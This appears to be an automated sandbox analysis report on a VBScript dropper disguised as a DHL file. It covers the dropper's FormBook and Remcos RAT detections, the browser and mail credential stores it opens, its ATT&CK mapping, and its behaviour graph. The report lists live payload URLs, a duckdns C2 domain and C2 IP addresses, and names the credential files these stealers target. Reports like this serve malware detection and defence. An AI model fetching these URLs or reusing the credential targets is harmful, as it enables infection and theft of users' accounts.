            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_222E2264
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Tries to steal Mail credentials (via file registry)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword19_2_004033F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword19_2_00402DB3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword19_2_00402DB3
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1496, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6624, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		221
            Scripting            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		11
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		2
            Credentials in Registry            		3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts212
            Command and Scripting Interpreter            		Login Hook412
            Process Injection            		1
            Software Packing            		1
            Credentials In Files            		29
            System Information Discovery            		Distributed Component Object Model11
            Input Capture            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell            		Network Logon Script11
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		LSA Secrets1
            Query Registry            		SSH2
            Clipboard Data            		24
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials151
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry            		DCSync141
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
            Virtualization/Sandbox Evasion            		Proc Filesystem4
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431984 Sample: DHL_ES567436735845755676678... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 84 jgbours284hawara01.duckdns.org 2->84 86 www.led-svitidla.eu 2->86 88 6 other IPs or domains 2->88 104 Snort IDS alert for network traffic 2->104 106 Multi AV Scanner detection for domain / URL 2->106 108 Found malware configuration 2->108 112 13 other signatures 2->112 15 wscript.exe 1 2->15         started        18 wab.exe 2->18         started        20 rundll32.exe 2->20         started        22 wab.exe 2->22         started        signatures3 110 Uses dynamic DNS services 84->110 process4 signatures5 166 VBScript performs obfuscated calls to suspicious functions 15->166 168 Suspicious powershell command line found 15->168 170 Wscript starts Powershell (via cmd or directly) 15->170 172 3 other signatures 15->172 24 powershell.exe 14 19 15->24         started        process6 dnsIp7 98 europrotectie.ro 188.212.111.134, 443, 49704 DATA-NODE-ASRO Romania 24->98 126 Suspicious powershell command line found 24->126 128 Very long command line found 24->128 130 Found suspicious powershell code related to unpacking or dynamic code loading 24->130 28 powershell.exe 17 24->28         started        31 conhost.exe 24->31         started        33 cmd.exe 1 24->33         started        signatures8 process9 signatures10 158 Suspicious powershell command line found 28->158 160 Very long command line found 28->160 162 Writes to foreign memory regions 28->162 164 Found suspicious powershell code related to unpacking or dynamic code loading 28->164 35 wab.exe 8 16 28->35         started        40 cmd.exe 1 28->40         started        process11 dnsIp12 90 jgbours284hawara01.duckdns.org 45.88.90.110, 3050, 49715, 49716 LVLT-10753US Bulgaria 35->90 92 duelvalenza.it 46.254.34.12, 443, 49713, 49714 SERVERPLAN-ASIT Italy 35->92 94 geoplugin.net 178.237.33.50, 49718, 80 ATOM86-ASATOM86NL Netherlands 35->94 80 C:\Users\user\AppData\Roaming\mvourhjs.dat, data 35->80 dropped 82 C:\Users\user\AppData\...\Sydstligstes.vbs, ASCII 35->82 dropped 120 Maps a DLL or memory area into another process 35->120 122 Installs a global keyboard hook 35->122 42 wscript.exe 1 35->42         started        45 cmd.exe 1 35->45         started        47 wab.exe 35->47         started        49 4 other processes 35->49 124 Uses cmd line tools excessively to alter registry or file data 40->124 file13 signatures14 process15 signatures16 138 Suspicious powershell command line found 42->138 140 Wscript starts Powershell (via cmd or directly) 42->140 142 Very long command line found 42->142 152 2 other signatures 42->152 51 powershell.exe 15 16 42->51         started        144 Uses cmd line tools excessively to alter registry or file data 45->144 55 reg.exe 1 1 45->55         started        57 conhost.exe 45->57         started        146 Tries to steal Instant Messenger accounts or passwords 47->146 148 Tries to steal Mail credentials (via file / registry access) 47->148 150 Tries to harvest and steal browser information (history, passwords, etc) 49->150 process17 dnsIp18 96 87.121.105.163, 49719, 49722, 80 NET1-ASBG Bulgaria 51->96 114 Suspicious powershell command line found 51->114 116 Very long command line found 51->116 59 powershell.exe 51->59         started        62 conhost.exe 51->62         started        64 cmd.exe 51->64         started        118 Creates multiple autostart registry keys 55->118 signatures19 process20 signatures21 154 Writes to foreign memory regions 59->154 156 Hides threads from debuggers 59->156 66 wab.exe 59->66         started        69 cmd.exe 59->69         started        71 wab.exe 59->71         started        process22 signatures23 100 Maps a DLL or memory area into another process 66->100 102 Hides threads from debuggers 66->102 73 qDlmBUIvkRrWNd.exe 66->73 injected 76 cmd.exe 66->76         started        process24 signatures25 132 Maps a DLL or memory area into another process 73->132 134 Found direct / indirect Syscall (likely to bypass EDR) 73->134 136 Uses cmd line tools excessively to alter registry or file data 76->136 78 conhost.exe 76->78         started        process26

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL_ES567436735845755676678877988975877.vbs35%ReversingLabsScript.Trojan.Heuristic
            DHL_ES567436735845755676678877988975877.vbs5%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            jgbours284hawara01.duckdns.org7%VirustotalBrowse
            europrotectie.ro0%VirustotalBrowse
            geoplugin.net4%VirustotalBrowse
            www.duelvalenza.it0%VirustotalBrowse
            duelvalenza.it3%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.imvu.comr0%URL Reputationsafe
            http://www.imvu.comr0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://geoplugin.net/json.gp100%URL Reputationphishing
            http://crl.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://crl.v0%URL Reputationsafe
            http://www.ebuddy.com0%URL Reputationsafe
            https://duelvalenza.it/FIPWKWOaFXJGe178.bin0%Avira URL Cloudsafe
            jgbours284hawara01.duckdns.org100%Avira URL Cloudmalware
            http://geoplugin.net/json.gpf0%Avira URL Cloudsafe
            http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin0%Avira URL Cloudsafe
            http://crl.microD0%Avira URL Cloudsafe
            http://87.121.105.1630%Avira URL Cloudsafe
            https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin0%Avira URL Cloudsafe
            jgbours284hawara01.duckdns.org7%VirustotalBrowse
            http://europrotectie.ro0%Avira URL Cloudsafe
            https://europrotectie.ro/Methink1.thnXRwl0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp0B80%Avira URL Cloudsafe
            http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin3%VirustotalBrowse
            https://europrotectie.ro/Methink1.thn0%Avira URL Cloudsafe
            http://europrotectie.ro0%VirustotalBrowse
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
            https://duelvalenza.it/0%Avira URL Cloudsafe
            http://87.121.105.16318%VirustotalBrowse
            https://duelvalenza.it/3%VirustotalBrowse
            http://geoplugin.net/json.gpf0%VirustotalBrowse
            https://europrotectie.ro/Methink1.thn0%VirustotalBrowse
            https://duelvalenza.it/FIPWKWOaFXJGe178.binq(0%Avira URL Cloudsafe
            https://europrotectie.ro0%Avira URL Cloudsafe
            http://87.121.105.163/Detentionen.javaXRwl0%Avira URL Cloudsafe
            http://87.121.1080%Avira URL Cloudsafe
            http://geoplugin.net/json.gp)B0%Avira URL Cloudsafe
            https://europrotectie.ro/Methink1.thnP0%Avira URL Cloudsafe
            http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==0%Avira URL Cloudsafe
            https://europrotectie.ro0%VirustotalBrowse
